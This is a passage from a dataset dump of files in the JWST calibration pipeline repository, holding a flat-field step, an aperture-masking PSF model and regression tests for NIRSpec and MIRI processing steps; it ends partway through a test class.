NRS_SPEC_MODES and\n exposure_type not in NRS_IMAGING_MODES):\n self.log.warning(\"Exposure type is %s; flat-fielding will be \"\n \"skipped because it is not currently \"\n \"supported for this mode.\", exposure_type)\n return self.skip_step(input_model)\n\n # Check whether extract_2d has been run.\n if (input_model.meta.cal_step.extract_2d == 'COMPLETE' and\n not exposure_type in EXTRACT_2D_IS_OK):\n self.log.warning(\"The extract_2d step has been run, but for \"\n \"%s data it should not have been run, so ...\",\n exposure_type)\n self.log.warning(\"flat fielding will be skipped.\")\n return self.skip_step(input_model)\n\n # Get reference file paths\n reference_file_names = {}\n for reftype in self.reference_file_types:\n reffile = self.get_reference_file(input_model, reftype)\n reference_file_names[reftype] = reffile if reffile != 'N/A' else None\n\n # Define mapping between reftype and datamodel type\n model_type = dict(\n flat=datamodels.FlatModel,\n fflat=datamodels.NirspecFlatModel,\n sflat=datamodels.NirspecFlatModel,\n dflat=datamodels.NirspecFlatModel,\n )\n if exposure_type == \"NRS_MSASPEC\":\n model_type[\"fflat\"] = datamodels.NirspecQuadFlatModel\n\n # Open the relevant reference files as datamodels\n reference_file_models = {}\n for reftype, reffile in reference_file_names.items():\n if reffile is not None:\n reference_file_models[reftype] = model_type[reftype](reffile)\n self.log.debug('Using %s reference file: %s', reftype.upper(), reffile)\n else:\n reference_file_models[reftype] = None\n\n # Do the flat-field correction\n output_model, interpolated_flats = flat_field.do_correction(\n input_model,\n **reference_file_models,\n )\n\n # Close the input and reference files\n input_model.close()\n try:\n for model in reference_file_models.values():\n model.close()\n except AttributeError:\n pass\n\n if self.save_interpolated_flat and interpolated_flats is not None:\n self.log.info(\"Writing interpolated flat field.\")\n self.save_model(interpolated_flats, suffix=self.flat_suffix)\n interpolated_flats.close()\n\n return output_model\n\n def skip_step(self, input_model):\n \"\"\"Set the calibration switch to 
SKIPPED.\n\n        This method makes a copy of input_model, sets the calibration\n        switch for the flat_field step to SKIPPED in the copy, closes\n        input_model, and returns the copy.\n        \"\"\"\n\n        result = input_model.copy()\n        result.meta.cal_step.flat_field = \"SKIPPED\"\n        input_model.close()\n        return result\n" }, { "alpha_fraction": 0.5639089941978455, "alphanum_fraction": 0.5743139982223511, "avg_line_length": 24.071611404418945, "blob_id": "6404162147d8307cf1a29e82c20eadd29d8d0352", "content_id": "565a4406dbebe36f83f94a939557ddfab6e8870a", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9803, "license_type": "permissive", "max_line_length": 81, "num_lines": 391, "path": "/jwst/ami/analyticnrm2.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\n# Heritage mathematica nb from Alex & Laurent\n# Python by Alex Greenbaum & Anand Sivaramakrishnan Jan 2013\n# updated May 2013 to include hexagonal envelope\n\nfrom . import hexee\n\nimport logging\nimport numpy as np\nimport scipy.special\nfrom . import leastsqnrm\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.DEBUG)\n\ndef Jinc(x, y):\n    \"\"\"\n    Short Summary\n    -------------\n    Compute 2d Jinc for given coordinates\n\n    Parameters\n    ----------\n    x,y: floats\n        input coordinates\n\n    Returns\n    -------\n    jinc_2d: float array\n        2d Jinc at the given coordinates, with NaNs replaced by pi/4.\n    \"\"\"\n    R = (Jinc.d / Jinc.lam) * Jinc.pitch * \\\n        np.sqrt((x - Jinc.offx)*(x - Jinc.offx) + \\\n        (y - Jinc.offy)*(y - Jinc.offy))\n\n    jinc_2d = leastsqnrm.replacenan(scipy.special.jv(1, np.pi * R)/(2.0 * R))\n\n    return jinc_2d\n\n\ndef phasor(kx, ky, hx, hy, lam, phi, pitch):\n    \"\"\"\n    Short Summary\n    -------------\n    Calculate the wavefront contribution of a single hole\n\n    Parameters\n    ----------\n    kx, ky: float\n        image plane coords in units of sampling pitch (oversampled, or not)\n\n    hx, hy: float\n        hole centers in meters\n\n    lam: float\n        wavelength\n\n    phi: float\n        distance of fringe from hole center in units of waves\n\n    pitch: float\n        sampling pitch in radians in image plane\n\n    Returns\n    -------\n    phasor: complex\n        wavefront contribution of a single hole\n    \"\"\"\n    return np.exp(-2 * np.pi * 1j * ((pitch * kx * hx + pitch * ky * hy)\n                   / lam + (phi / lam)))\n\n\ndef interf(kx, ky):\n    \"\"\"\n    Short Summary\n    -------------\n    Calculate interference for all holes.\n\n    Parameters\n    ----------\n    kx, ky: float, float\n        x-component and y-component of image plane (spatial frequency) vector\n\n    Returns\n    -------\n    interference: 2D complex array\n        interference for all holes\n    \"\"\"\n    interference = 0j\n    for hole, ctr in enumerate(interf.ctrs):\n        interference += phasor((kx - interf.offx), (ky - interf.offy),\n                               ctr[0], ctr[1], interf.lam,\n                               interf.phi[hole], interf.pitch)\n\n    return interference\n\n\ndef ASF(pixel, fov, oversample, ctrs, d, lam, phi, centering=(0.5, 0.5)):\n    \"\"\"\n    Short Summary\n    -------------\n    Calculate the Amplitude Spread Function (a.k.a. 
image plane complex\n amplitude) for a circular aperture\n\n Parameters\n ----------\n pixel: float\n pixel scale\n\n fov: integer\n number of detector pixels on a side\n\n oversample: integer\n oversampling factor\n\n ctrs: float, float\n coordinates of hole center\n\n d: float\n hole diameter\n\n lam: float\n wavelength\n\n phi: float\n distance of fringe from hole center in units of waves\n\n centering: string\n if set to 'PIXELCENTERED' or unspecified, the offsets will be set to\n (0.5,0.5); if set to 'PIXELCORNER', the offsets will be set to\n (0.0,0.0).\n\n Returns\n -------\n asf: 2D complex array\n Amplitude Spread Function (a.k.a. image plane complex amplitude) for\n a circular aperture\n \"\"\"\n if centering == 'PIXELCENTERED':\n off_x = 0.5\n off_y = 0.5\n elif centering == 'PIXELCORNER':\n off_x = 0.0\n off_y = 0.0\n else:\n off_x, off_y = centering\n\n log.debug('ASF centering %s:', centering)\n log.debug('ASF offsets %s %s:', off_x, off_y)\n\n # Jinc parameters\n Jinc.lam = lam\n Jinc.offx = oversample * fov / 2.0 - off_x # in pixels\n Jinc.offy = oversample * fov / 2.0 - off_y\n Jinc.pitch = pixel / float(oversample)\n Jinc.d = d\n\n primarybeam = np.fromfunction(Jinc, (int((oversample * fov)),\n int((oversample * fov))))\n primarybeam = primarybeam.transpose()\n\n # interference terms' parameters\n interf.lam = lam\n interf.offx = oversample * fov / 2.0 - off_x # in pixels\n interf.offy = oversample * fov / 2.0 - off_y\n interf.pitch = pixel / float(oversample)\n interf.ctrs = ctrs\n interf.phi = phi\n\n fringing = np.fromfunction(interf, (int((oversample * fov)),\n int((oversample * fov))))\n fringing = fringing.transpose()\n\n asf = primarybeam * fringing\n\n return asf\n\n\ndef ASFfringe(pixel, fov, oversample, ctrs, d, lam, phi, centering=(0.5, 0.5)):\n \"\"\"\n Short Summary\n -------------\n Amplitude Spread Function (a.k.a. image plane complex amplitude)\n for a fringe\n\n Parameters\n ----------\n pixel: float\n pixel scale\n\n fov: integer\n number of detector pixels on a side\n\n oversample: integer\n oversampling factor\n\n ctrs: 2D float array\n centers of holes\n\n d: float\n hole diameter\n\n lam: float\n wavelength\n\n phi: float\n distance of fringe from hole center in units of waves\n\n centering: string\n if set to 'PIXELCENTERED' or unspecified, the offsets will be set to\n (0.5,0.5); if set to 'PIXELCORNER', the offsets will be set to\n (0.0,0.0).\n\n Returns\n -------\n fringing: 2D complex array\n Amplitude Spread Function (a.k.a. 
image plane complex amplitude) for\n a fringe\n \"\"\"\n if centering == 'PIXELCENTERED':\n off_x = 0.5\n off_y = 0.5\n elif centering == 'PIXELCORNER':\n off_x = 0.0\n off_y = 0.0\n else:\n off_x, off_y = centering\n\n log.debug('ASFfringe centering %s:', centering)\n log.debug('ASFfringe offsets %s %s:', off_x, off_y)\n\n # Jinc parameters\n Jinc.lam = lam\n Jinc.offx = oversample * fov / 2.0 - off_x # in pixels\n Jinc.offy = oversample * fov / 2.0 - off_y\n Jinc.pitch = pixel / float(oversample)\n Jinc.d = d\n\n # interference terms' parameters\n interf.lam = lam\n interf.offx = oversample * fov / 2.0 - off_x # in pixels\n interf.offy = oversample * fov / 2.0 - off_y\n interf.pitch = pixel / float(oversample)\n interf.ctrs = ctrs\n interf.phi = phi\n\n fringing = np.fromfunction(interf, (int((oversample * fov)),\n int((oversample * fov))))\n fringing = fringing.transpose()\n\n return fringing\n\n\ndef ASFhex(pixel, fov, oversample, ctrs, d, lam, phi, centering='PIXELCENTERED'):\n \"\"\"\n Short Summary\n -------------\n Amplitude Spread Function (a.k.a. image plane complex amplitude)\n for a hexagonal aperture\n\n Parameters\n ----------\n pixel: float\n pixel scale\n\n fov: integer\n number of detector pixels on a side\n\n oversample: integer\n oversampling factor\n\n ctrs: 2D float array\n centers of holes\n\n d: float\n flat-to-flat distance across hexagon\n\n lam: float\n wavelength\n\n phi: float\n distance of fringe from hole center in units of waves\n\n centering: string\n type of centering\n\n Returns\n -------\n asf: 2D complex array\n Amplitude Spread Function (a.k.a. image plane complex amplitude) for\n a hexagonal aperture\n \"\"\"\n log.debug('centering: %s', centering)\n\n if centering == 'PIXELCENTERED':\n off_x = 0.5\n off_y = 0.5\n elif centering == 'PIXELCORNER':\n off_x = 0.0\n off_y = 0.0\n else:\n off_x, off_y = centering\n\n #Hex kwargs\n offx = (float(oversample * fov) / 2.0) - off_x # in pixels\n offy = (float(oversample * fov) / 2.0) - off_y\n\n log.debug('ASF offsets for x and y in pixels: %s %s', offx, offy)\n log.debug('ASF centering:%s', centering)\n\n pitch = pixel / float(oversample)\n\n # interference terms' parameters\n interf.lam = lam\n interf.offx = (oversample * fov) / 2.0 - off_x # in pixels\n interf.offy = (oversample * fov) / 2.0 - off_y\n interf.pitch = pixel / float(oversample)\n interf.ctrs = ctrs\n interf.phi = phi\n\n primarybeam = hexee.hex_eeAG(s=(oversample * fov, oversample * fov),\n c=(offx, offy), d=d, lam=lam, pitch=pitch)\n\n fringing = np.fromfunction(interf, (int((oversample * fov)),\n int((oversample * fov))))\n fringing = fringing.transpose()\n\n asf = primarybeam * fringing\n\n return asf\n\n\ndef PSF(pixel, fov, oversample, ctrs, d, lam, phi, centering='PIXELCENTERED',\n shape='circ'):\n \"\"\"\n Short Summary\n -------------\n Calculate the PSF for the requested shape\n\n Parameters\n ----------\n pixel: float\n pixel scale\n\n fov: integer\n number of detector pixels on a side\n\n oversample: integer\n oversampling factor\n\n ctrs: 2D float array\n centers of holes\n\n d: float\n hole diameter for 'circ'; flat-to-flat distance across for 'hex'\n\n lam: float\n wavelength\n\n phi: float\n distance of fringe from hole center in units of waves\n\n centering: string\n type of centering\n\n shape: string\n shape of hole; possible values are 'circ', 'hex', and 'fringe'\n\n Returns\n -------\n PSF - 2D float array\n \"\"\"\n if shape == 'circ':\n asf = ASF(pixel, fov, oversample, ctrs, d, lam, phi, centering)\n elif shape == 'hex':\n 
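# for 'hex', d is the hexagon's flat-to-flat distance (see ASFhex)\n        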
asf = ASFhex(pixel, fov, oversample, ctrs, d, lam, phi, centering)\n elif shape == 'fringe': # Alex: \"not needed,only used for visualization\"\n asf = ASFfringe(pixel, fov, oversample, ctrs, d, lam, phi, centering)\n else:\n log.critical('Pupil shape %s not supported', shape)\n\n log.debug('-----------------')\n log.debug(' PSF Parameters: ')\n log.debug('-----------------')\n log.debug('pixel: %s, fov: %s, oversampling: %s', pixel, fov, oversample)\n log.debug('d: %s, wavelength: %s, pistons: %s, shape: %s', d, lam, phi,\n shape)\n\n PSF_ = asf * asf.conj()\n\n return PSF_.real\n" }, { "alpha_fraction": 0.6436781883239746, "alphanum_fraction": 0.6436781883239746, "avg_line_length": 28, "blob_id": "a673bbc4f7360115f8899349f895c1f98b924ceb", "content_id": "31ae03591f83fe436851ceaf4be60d601bb3489a", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 87, "license_type": "permissive", "max_line_length": 56, "num_lines": 3, "path": "/docs/jwst/white_light/arguments.rst", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "Step Arguments\n==============\nThe ``white_light`` step has no step-specific arguments.\n" }, { "alpha_fraction": 0.6119047403335571, "alphanum_fraction": 0.6380952596664429, "avg_line_length": 20, "blob_id": "712514f351427de1c718442ea842d3cde62b30f7", "content_id": "7ab36dcf9a0a1eaa3fc4716319fea5216cf174ce", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 420, "license_type": "permissive", "max_line_length": 55, "num_lines": 20, "path": "/jwst/datamodels/tests/test_level1b.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Test Level1bModel\"\"\"\n\nimport pytest\nimport numpy as np\n\nfrom .. 
import Level1bModel\n\n\[email protected]\ndef test_no_zeroframe():\n \"\"\"Test for default zeroframe\"\"\"\n nx = 10\n ny = 10\n ngroups = 5\n nints = 2\n\n data = np.zeros((nints, ngroups, ny, nx), np.int16)\n model = Level1bModel(data)\n assert model.data.shape == (nints, ngroups, ny, nx)\n assert model.zeroframe.shape == (nints, ny, nx)\n" }, { "alpha_fraction": 0.3427337408065796, "alphanum_fraction": 0.5027947425842285, "avg_line_length": 48.20000076293945, "blob_id": "e3aa748d2d9db2c43f040ce52655d2a61ec0c8a2", "content_id": "9a4f86e54db1f6a68f00f4e6bfeeb5ef88bea81e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3936, "license_type": "permissive", "max_line_length": 87, "num_lines": 80, "path": "/jwst/tests_nightly/general/nirspec/test_spec2pipelines.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom jwst.pipeline import Spec2Pipeline\n\nfrom jwst.tests.base_classes import BaseJWSTTest\nfrom jwst.tests.base_classes import pytest_generate_tests # noqa: F401\n\n\[email protected]\nclass TestSpec2Pipeline(BaseJWSTTest):\n input_loc = 'nirspec'\n ref_loc = ['test_pipelines', 'truth']\n test_dir = 'test_pipelines'\n\n # Specification of parameters for Spec2Pipeline tests\n params = {'test_spec2':\n # test_nrs_fs_multi_spec2_1: NIRSpec fixed-slit data\n [dict(input='jw00023001001_01101_00001_NRS1_rate.fits',\n outputs=[('jw00023001001_01101_00001_NRS1_cal.fits',\n 'jw00023001001_01101_00001_NRS1_cal_ref.fits'),\n ('jw00023001001_01101_00001_NRS1_s2d.fits',\n 'jw00023001001_01101_00001_NRS1_s2d_ref.fits'),\n ('jw00023001001_01101_00001_NRS1_x1d.fits',\n 'jw00023001001_01101_00001_NRS1_x1d_ref.fits')\n ],\n id=\"nirspec_fs_multi_1\"\n ),\n # test_nrs_fs_multi_spec2_2: NIRSpec fixed-slit data\n dict(input= 'jwtest1013001_01101_00001_NRS1_rate.fits',\n outputs=[('jwtest1013001_01101_00001_NRS1_cal.fits',\n 'jwtest1013001_01101_00001_NRS1_cal_ref.fits'),\n ('jwtest1013001_01101_00001_NRS1_s2d.fits',\n 'jwtest1013001_01101_00001_NRS1_s2d_ref.fits'),\n ('jwtest1013001_01101_00001_NRS1_x1d.fits',\n 'jwtest1013001_01101_00001_NRS1_x1d_ref.fits')\n ],\n id=\"nirspec_fs_multi_2\"\n ),\n # test_nrs_fs_multi_spec2_3:\n # NIRSpec fixed-slit data using the ALLSLITS subarray and detector NRS2\n # NIRSpec fixed-slit data that uses a single-slit subarray (S200B1).\n dict(input= 'jw84600002001_02101_00001_nrs2_rate.fits',\n outputs=[('jw84600002001_02101_00001_nrs2_cal.fits',\n 'jw84600002001_02101_00001_nrs2_cal_ref.fits'),\n ('jw84600002001_02101_00001_nrs2_s2d.fits',\n 'jw84600002001_02101_00001_nrs2_s2d_ref.fits'),\n ('jw84600002001_02101_00001_nrs2_x1d.fits',\n 'jw84600002001_02101_00001_nrs2_x1d_ref.fits')\n ],\n id=\"nirspec_fs_multi_3\"\n ),\n # test_nrs_ifu_spec2: NIRSpec IFU data\n dict(input= 'jw95175001001_02104_00001_nrs1_rate.fits',\n outputs=[('jw95175001001_02104_00001_nrs1_cal.fits',\n 'jw95175001001_02104_00001_nrs1_cal_ref.fits'),\n ('jw95175001001_02104_00001_nrs1_s3d.fits',\n 'jw95175001001_02104_00001_nrs1_s3d_ref.fits'),\n ('jw95175001001_02104_00001_nrs1_x1d.fits',\n 'jw95175001001_02104_00001_nrs1_x1d_ref.fits')\n ],\n id = \"nirspec_ifu\"\n )\n ]\n }\n\n def test_spec2(self, input, outputs):\n \"\"\"\n Regression test of calwebb_spec2 pipeline performed on NIRSpec data.\n \"\"\"\n input_file = self.get_data(self.test_dir, input)\n\n step = Spec2Pipeline()\n step.save_bsub = True\n step.save_results = True\n step.resample_spec.save_results = True\n 
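# save the intermediate 2-D, 3-D, and 1-D spectral products compared below\n        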
step.cube_build.save_results = True\n step.extract_1d.save_results = True\n step.run(input_file)\n\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.5622591376304626, "alphanum_fraction": 0.5953651666641235, "avg_line_length": 37.5485725402832, "blob_id": "c1067a5fc296d1851e30c9e59564f53ebcfa0ac8", "content_id": "83ec5ffad15a7c54c997ff9a73b67078c952f250", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20238, "license_type": "permissive", "max_line_length": 105, "num_lines": 525, "path": "/jwst/tests_nightly/general/miri/test_miri_steps_single.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import os\nimport numpy as np\nfrom numpy.testing import assert_allclose\nimport pytest\nfrom gwcs.wcstools import grid_from_bounding_box\nfrom ci_watson.artifactory_helpers import get_bigdata\n\nfrom jwst import datamodels\nfrom jwst.datamodels import ImageModel, RegionsModel, CubeModel\nfrom jwst.stpipe import crds_client\nfrom jwst.lib.set_telescope_pointing import add_wcs\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.assign_wcs import AssignWcsStep\nfrom jwst.cube_build import CubeBuildStep\nfrom jwst.linearity import LinearityStep\nfrom jwst.ramp_fitting import RampFitStep\nfrom jwst.master_background import MasterBackgroundStep\n\n\[email protected]\nclass TestMIRIRampFit(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_ramp_fit', 'truth']\n test_dir = 'test_ramp_fit'\n\n def test_ramp_fit_miri1(self):\n \"\"\"\n Regression test of ramp_fit step performed on MIRI data.\n \"\"\"\n input_file = self.get_data(self.test_dir, 'jw00001001001_01101_00001_MIRIMAGE_jump.fits')\n\n result = RampFitStep.call(input_file,\n save_opt=True,\n opt_name='rampfit1_opt_out.fits')\n output_file = result[0].save(path=result[0].meta.filename.replace('jump','rampfit'))\n int_output = result[1].save(path=result[1].meta.filename.replace('jump','rampfit_int'))\n result[0].close()\n result[1].close()\n\n outputs = [(output_file,\n 'jw00001001001_01101_00001_MIRIMAGE_ramp_fit.fits'),\n (int_output,\n 'jw00001001001_01101_00001_MIRIMAGE_int.fits'),\n ('rampfit1_opt_out_fitopt.fits',\n 'jw00001001001_01101_00001_MIRIMAGE_opt.fits')\n ]\n self.compare_outputs(outputs)\n\n def test_ramp_fit_miri2(self):\n \"\"\"\n Regression test of ramp_fit step performed on MIRI data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw80600012001_02101_00003_mirimage_jump.fits')\n\n result = RampFitStep.call(input_file,\n save_opt=True,\n opt_name='rampfit2_opt_out.fits')\n\n output_file = result[0].save(path=result[0].meta.filename.replace('jump','rampfit'))\n int_output = result[1].save(path=result[1].meta.filename.replace('jump','rampfit_int'))\n result[0].close()\n result[1].close()\n\n outputs = [(output_file,\n 'jw80600012001_02101_00003_mirimage_ramp.fits'),\n (int_output,\n 'jw80600012001_02101_00003_mirimage_int.fits'),\n ('rampfit2_opt_out_fitopt.fits',\n 'jw80600012001_02101_00003_mirimage_opt.fits')\n ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestMIRICube(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_cube_build', 'truth']\n test_dir = 'test_cube_build'\n rtol = 0.000001\n\n def test_cubebuild_miri(self):\n \"\"\"\n Regression test of cube_build performed on MIRI MRS data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw10001001001_01101_00001_mirifushort_cal.fits')\n\n 
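# open the calibrated exposure as an IFU image model for cube building\n        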
input_model = datamodels.IFUImageModel(input_file)\n CubeBuildStep.call(input_model, output_type='multi', save_results=True)\n\n outputs = [('jw10001001001_01101_00001_mirifushort_s3d.fits',\n 'jw10001001001_01101_00001_mirifushort_s3d_ref.fits',\n ['primary','sci','err','dq','wmap']) ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestMIRILinearity(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_linearity','truth']\n test_dir ='test_linearity'\n\n def test_linearity_miri3(self):\n \"\"\"\n Regression test of linearity step performed on MIRI data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00001001001_01109_00001_MIRIMAGE_dark_current.fits')\n # get supplemental input\n override_file = self.get_data(self.test_dir,\n \"lin_nan_flag_miri.fits\")\n # run calibration step\n result = LinearityStep.call(input_file,\n override_linearity=override_file)\n\n output_file = result.meta.filename\n result.save(output_file)\n result.close()\n\n outputs = [(output_file,\n 'jw00001001001_01109_00001_MIRIMAGE_linearity.fits') ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestMIRIWCSFixed(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_wcs','fixed','truth']\n test_dir = os.path.join('test_wcs','fixed')\n\n def test_miri_fixed_slit_wcs(self):\n \"\"\"\n Regression test of creating a WCS object and doing pixel to sky transformation.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00035001001_01101_00001_mirimage_rate.fits')\n result = AssignWcsStep.call(input_file, save_results=True)\n\n cwd = os.path.abspath('.')\n os.makedirs('truth', exist_ok=True)\n os.chdir('truth')\n truth_file = self.get_data(*self.ref_loc,\n 'jw00035001001_01101_00001_mirimage_assign_wcs.fits')\n os.chdir(cwd)\n truth = ImageModel(truth_file)\n\n x, y = grid_from_bounding_box(result.meta.wcs.bounding_box)\n ra, dec, lam = result.meta.wcs(x, y)\n raref, decref, lamref = truth.meta.wcs(x, y)\n assert_allclose(ra, raref)\n assert_allclose(dec, decref)\n assert_allclose(lam, lamref)\n\n\[email protected]\nclass TestMIRIWCSIFU(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_wcs', 'ifu', 'truth']\n test_dir = os.path.join('test_wcs', 'ifu')\n\n def test_miri_ifu_wcs(self):\n \"\"\"\n Regression test of creating a WCS object and doing pixel to sky transformation.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00024001001_01101_00001_MIRIFUSHORT_uncal_MiriSloperPipeline.fits')\n result = AssignWcsStep.call(input_file, save_results=True)\n\n # Get the region file\n region = RegionsModel(crds_client.get_reference_file(result, 'regions'))\n # Choose the same plane as in the miri.py file (hardcoded for now).\n regions = region.regions[7, :, :]\n\n # inputs\n x, y = grid_from_bounding_box(result.meta.wcs.bounding_box)\n\n # Get indices where pixels == 0. 
These should be NaNs in the output.\n        ind_zeros = regions == 0\n\n        cwd = os.path.abspath('.')\n        os.makedirs('truth', exist_ok=True)\n        os.chdir('truth')\n        truth_file = self.get_data(*self.ref_loc,\n                                   'jw00024001001_01101_00001_MIRIFUSHORT_assign_wcs.fits')\n        os.chdir(cwd)\n        truth = ImageModel(truth_file)\n\n        ra, dec, lam = result.meta.wcs(x, y)\n        raref, decref, lamref = truth.meta.wcs(x, y)\n        assert_allclose(ra, raref, equal_nan=True)\n        assert_allclose(dec, decref, equal_nan=True)\n        assert_allclose(lam, lamref, equal_nan=True)\n\n        # Test that we got NaNs at ind_zero\n        assert(np.isnan(ra).nonzero()[0] == ind_zeros.nonzero()[0]).all()\n        assert(np.isnan(ra).nonzero()[1] == ind_zeros.nonzero()[1]).all()\n\n        # Test the inverse transform\n        x1, y1 = result.meta.wcs.backward_transform(ra, dec, lam)\n        assert(np.isnan(x1).nonzero()[0] == ind_zeros.nonzero()[0]).all()\n        assert (np.isnan(x1).nonzero()[1] == ind_zeros.nonzero()[1]).all()\n\n        # Also run a smoke test with values outside the region.\n        dec[100][200] = -80\n        ra[100][200] = 7\n        lam[100][200] = 15\n\n        x2, y2 = result.meta.wcs.backward_transform(ra, dec, lam)\n        assert np.isnan(x2[100][200])\n        assert np.isnan(y2[100][200])\n\n\[email protected]\nclass TestMIRIWCSImage(BaseJWSTTest):\n    input_loc = 'miri'\n    ref_loc = ['test_wcs', 'image', 'truth']\n    test_dir = os.path.join('test_wcs', 'image')\n\n    def test_miri_image_wcs(self):\n        \"\"\"\n        Regression test of creating a WCS object and doing pixel to sky transformation.\n        \"\"\"\n\n        input_file = self.get_data(self.test_dir,\n                                   \"jw00001001001_01101_00001_MIRIMAGE_ramp_fit.fits\")\n        result = AssignWcsStep.call(input_file, save_results=True)\n\n        cwd = os.path.abspath('.')\n        os.makedirs('truth', exist_ok=True)\n        os.chdir('truth')\n        truth_file = self.get_data(*self.ref_loc,\n                                   \"jw00001001001_01101_00001_MIRIMAGE_assign_wcs.fits\")\n        os.chdir(cwd)\n        truth = ImageModel(truth_file)\n\n        x, y = grid_from_bounding_box(result.meta.wcs.bounding_box)\n        ra, dec = result.meta.wcs(x, y)\n        raref, decref = truth.meta.wcs(x, y)\n        assert_allclose(ra, raref)\n        assert_allclose(dec, decref)\n\n\[email protected]\nclass TestMIRIWCSSlitless(BaseJWSTTest):\n    input_loc = 'miri'\n    ref_loc = ['test_wcs', 'slitless', 'truth']\n    test_dir = os.path.join('test_wcs', 'slitless')\n\n    def test_miri_slitless_wcs(self):\n        \"\"\"\n        Regression test of creating a WCS object and doing pixel to sky transformation.\n        \"\"\"\n        input_file = self.get_data(self.test_dir,\n                                   \"jw80600012001_02101_00003_mirimage_rateints.fits\")\n        result = AssignWcsStep.call(input_file, save_results=True)\n\n        cwd = os.path.abspath('.')\n        os.makedirs('truth', exist_ok=True)\n        os.chdir('truth')\n        truth_file = self.get_data(*self.ref_loc,\n                                   \"jw80600012001_02101_00003_mirimage_assignwcsstep.fits\")\n        os.chdir(cwd)\n        truth = CubeModel(truth_file)\n\n        x, y = grid_from_bounding_box(result.meta.wcs.bounding_box)\n        ra, dec, lam = result.meta.wcs(x, y)\n        raref, decref, lamref = truth.meta.wcs(x, y)\n        assert_allclose(ra, raref)\n        assert_allclose(dec, decref)\n        assert_allclose(lam, lamref)\n\n\[email protected]\nclass TestMIRISetPointing(BaseJWSTTest):\n    input_loc = 'miri'\n    ref_loc = ['test_pointing', 'truth']\n    test_dir = 'test_pointing'\n    rtol = 0.000001\n\n    def test_miri_setpointing(self):\n        \"\"\"\n        Regression test of the set_telescope_pointing script on a level-1b MIRI file.\n        \"\"\"\n\n        # Copy original version of file to test file, which will get overwritten by test\n        input_file = self.get_data(self.test_dir,\n                                   'jw80600010001_02101_00001_mirimage_uncal_orig.fits')\n        # Get 
        # Get SIAF PRD database file\n        siaf_prd_loc = ['jwst-pipeline', self.env, 'common', 'prd.db']\n        siaf_path = get_bigdata(*siaf_prd_loc)\n\n        add_wcs(input_file, allow_default=True, siaf_path=siaf_path)\n\n        outputs = [(input_file,\n                    'jw80600010001_02101_00001_mirimage_uncal_ref.fits')]\n        self.compare_outputs(outputs)\n\n\[email protected]\nclass TestMIRIMasterBackgroundLRS(BaseJWSTTest):\n    input_loc = 'miri'\n    ref_loc = ['test_masterbackground', 'lrs', 'truth']\n    test_dir = ['test_masterbackground', 'lrs']\n\n    rtol = 0.000001\n\n    def test_miri_lrs_masterbg_user(self):\n        \"\"\"\n        Regression test of master background subtraction with LRS, with a user-provided 1-D background\n        \"\"\"\n\n        # input file has the background added\n        input_file = self.get_data(*self.test_dir, 'miri_lrs_sci+bkg_cal.fits')\n        # user-provided 1-D background\n        user_background = self.get_data(*self.test_dir, 'miri_lrs_bkg_x1d.fits')\n\n        result = MasterBackgroundStep.call(input_file,\n                                           user_background=user_background,\n                                           save_results=True)\n\n        # Compare result (background subtracted image) to science image with no\n        # background. Subtract these images, smooth the subtracted image and\n        # the mean should be close to zero.\n        input_sci_cal_file = self.get_data(*self.test_dir,\n                                           'miri_lrs_sci_cal.fits')\n        input_sci = datamodels.open(input_sci_cal_file)\n\n        # find the LRS region\n        bb = result.meta.wcs.bounding_box\n        x, y = grid_from_bounding_box(bb)\n        result_lrs_region = result.data[y.astype(int), x.astype(int)]\n        sci_lrs_region = input_sci.data[y.astype(int), x.astype(int)]\n\n        # do a 5 sigma clip on the science image\n        sci_mean = np.nanmean(sci_lrs_region)\n        sci_std = np.nanstd(sci_lrs_region)\n        upper = sci_mean + sci_std*5.0\n        lower = sci_mean - sci_std*5.0\n        mask_clean = np.logical_and(sci_lrs_region < upper, sci_lrs_region > lower)\n\n        sub = result_lrs_region - sci_lrs_region\n        mean_sub = np.absolute(np.mean(sub[mask_clean]))\n\n        atol = 0.1\n        rtol = 0.001\n        assert_allclose(mean_sub, 0, atol=atol, rtol=rtol)\n\n        # Compare the background subtracted science data (result)\n        # to a truth file.\n        truth_file = self.get_data(*self.ref_loc,\n                                   'miri_lrs_sci+bkg_masterbackgroundstep.fits')\n\n        result_file = result.meta.filename\n        outputs = [(result_file, truth_file)]\n        self.compare_outputs(outputs)\n        result.close()\n        input_sci.close()\n\n\[email protected]\nclass TestMIRIMasterBackgroundMRSDedicated(BaseJWSTTest):\n    input_loc = 'miri'\n    ref_loc = ['test_masterbackground', 'mrs', 'dedicated', 'truth']\n    test_dir = ['test_masterbackground', 'mrs', 'dedicated']\n\n    rtol = 0.000001\n\n    def test_miri_masterbg_mrs_dedicated(self):\n        